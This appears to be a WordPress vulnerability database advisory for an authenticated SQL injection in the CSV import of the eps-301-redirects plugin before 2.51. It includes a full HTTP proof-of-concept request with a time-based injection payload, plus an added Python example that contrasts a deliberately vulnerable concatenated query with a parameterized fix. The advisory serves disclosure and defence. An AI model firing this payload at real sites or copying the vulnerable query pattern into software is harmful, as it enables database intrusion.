WordPress Plugin Vulnerabilities

301 Redirects - Easy Redirect Manager < 2.51 - Authenticated SQL Injection

Description

The plugin does not sanitise its "Redirect From" column when importing a CSV file, allowing high privilege users to perform SQL injections.

The PoC video provided mentioned 2.53 as vulnerable; however, v2.45 was installed and used. The issue has been verified to have been fixed in 2.51.

Proof of Concept

POST /wp-admin/options-general.php?page=eps_redirects&tab=import-export HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:84.0) Gecko/20100101 Firefox/84.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://example.com/wp-admin/options-general.php?page=eps_redirects&tab=import-export
Content-Type: multipart/form-data; boundary=---------------------------28588551781499779692758371208
Content-Length: 682
Connection: close
Cookie: [Admin cookies]
Upgrade-Insecure-Requests: 1

-----------------------------28588551781499779692758371208
Content-Disposition: form-data; name="eps_redirect_nonce_submit"

283965d8a1
-----------------------------28588551781499779692758371208
Content-Disposition: form-data; name="eps_redirect_upload_file"; filename="2021-01-19-redirects.csv"
Content-Type: text/csv

301,' or sleep(2)#,/yolo,0

-----------------------------28588551781499779692758371208
Content-Disposition: form-data; name="eps_redirect_upload"

Upload CSV
-----------------------------28588551781499779692758371208
Content-Disposition: form-data; name="eps_redirect_upload_method"

skip
-----------------------------28588551781499779692758371208--
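
The import flaw described above next to a hardened import, as an added example that is not the plugin's code. SQLite stands in for the WordPress MySQL database; the table layout, the column meanings (status, Redirect From, Redirect To, hit count, inferred from the PoC row) and the validation policy are assumptions.

```python
import csv
import io
import re
import sqlite3

# Constructed sample: one ordinary row plus the CSV row from the PoC above.
SAMPLE_CSV = "301,/old-page,/new-page,0\n301,' or sleep(2)#,/yolo,0\n"

# Assumed policy: "Redirect From" is a site-relative path of URL-safe characters.
SAFE_PATH = re.compile(r"^/?[A-Za-z0-9._~/%-]+$")
ALLOWED_STATUS = {"301", "302", "307"}


def make_db():
    # Hypothetical table; the plugin's real schema is not shown in the advisory.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE redirects (status TEXT, url_from TEXT, url_to TEXT, hits INTEGER)")
    return db


def exists_unsafe(db, url_from):
    # Vulnerable pattern: the CSV value is spliced into the SQL text, so a quote
    # in the value ends the string literal and the rest is parsed as SQL.
    sql = "SELECT 1 FROM redirects WHERE url_from = '" + url_from + "'"
    return db.execute(sql).fetchone() is not None


def exists_safe(db, url_from):
    # Bound parameter: the value is passed as data and never parsed as SQL.
    row = db.execute("SELECT 1 FROM redirects WHERE url_from = ?", (url_from,)).fetchone()
    return row is not None


def import_csv(db, text):
    """Validate each row, skip duplicates, and insert with bound parameters."""
    imported, rejected = [], []
    for row in csv.reader(io.StringIO(text)):
        f = [c.strip() for c in row]
        ok = (len(f) == 4 and f[0] in ALLOWED_STATUS
              and SAFE_PATH.match(f[1]) and f[3].isdigit())
        if not ok:
            rejected.append(f)  # keep for the import report instead of querying with it
            continue
        if not exists_safe(db, f[1]):
            db.execute("INSERT INTO redirects VALUES (?, ?, ?, ?)", (f[0], f[1], f[2], int(f[3])))
            imported.append(f[1])
    return imported, rejected
```

With SQLite the concatenated query fails to parse for the PoC value; on MySQL, `#` starts a comment, so the same string parses as valid SQL and the injected expression is evaluated.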
 

Affects Plugins

eps-301-redirects
Fixed in version 2.51

References

CVE
CVE-2021-24142
URL
https://drive.google.com/file/d/1Z7nVtAOe_Y59kvJ87Aqxp_xVPHMqmgo8/view?usp=sharing

Classification

Type

SQLI

OWASP top 10
A1: Injection
CWE
CWE-89

Miscellaneous

Original Researcher

Nguyen Van Khanh - SunCSR (Sun* Cyber Security Research)

Submitter

khanh

Submitter website
http://research.sun-asterisk.com/
Verified

Yes

WPVDB ID
19800898-d7b6-4edd-887b-dac3c0597f14

Timeline

Publicly Published

2021-01-18 (about 2 years ago)

Added

2021-01-19 (about 2 years ago)

Last Updated

2021-01-21 (about 2 years ago)
